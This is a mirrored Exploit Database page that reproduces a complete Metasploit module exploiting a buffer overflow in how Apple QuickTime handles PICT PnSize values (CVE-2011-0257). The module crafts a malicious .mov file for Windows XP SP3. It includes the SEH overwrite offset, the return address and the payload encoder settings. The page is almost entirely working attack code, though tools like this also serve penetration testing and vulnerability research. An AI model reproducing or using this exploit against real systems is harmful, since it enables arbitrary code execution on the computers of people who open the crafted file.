Apple QuickTime – PICT PnSize Buffer Overflow (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2011-09-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17777/

• ##
  # $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = GoodRanking
  
  	include Msf::Exploit::FILEFORMAT
  	include Msf::Exploit::Seh
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Apple QuickTime PICT PnSize Buffer Overflow',
  			'Description'=> %q{
  					This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
  				When opening a .mov file containing a specially crafted PnSize value, an attacker
  				may be able to execute arbitrary code. 
  			},
  			'License'=> MSF_LICENSE,
  			'Author' => [ 'MC' ],
  			'Version'=> '$Revision: 13691 $',
  			'References' =>
  				[
  					[ 'CVE', '2011-0257' ],
  					[ 'BID', '49144' ],
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'process',
  					'DisablePayloadHandler' => 'true',
  				},
  			'Payload'=>
  				{
  					'Space'=> 750,
  					'BadChars' => "",
  					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
  					'DisableNops'=>'True',
  					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
  					'EncoderOptions' =>
  						{
  							'BufferRegister' => 'ECX',
  						},
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					[ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0
  				],
  			'Privileged' => false,
  			'DisclosureDate' => 'Aug 8 2011',
  			'DefaultTarget'=> 0))
  
  		register_options(
  			[
  				OptString.new('FILENAME', [ false, 'The file name.','msf.mov' ]),
  			], self.class)
  	end
  
  	def exploit
  
  		trigger = rand_text_alpha_upper(3324)
  		trigger[2302, 8]= generate_seh_record(target.ret)
  		trigger[2310, payload.encoded.size] = payload.encoded
  
  		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
  		fd = File.open(path, "rb" )
  		sploit = fd.read(fd.stat.size)
  		fd.close
  
  		sploit << trigger
  
  		file_create(sploit)
  	end
  end
  __END__
  http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt
  
  Opcode Name DescriptionData Size (in bytes)
  
  $0007PnSize pen size (point) 4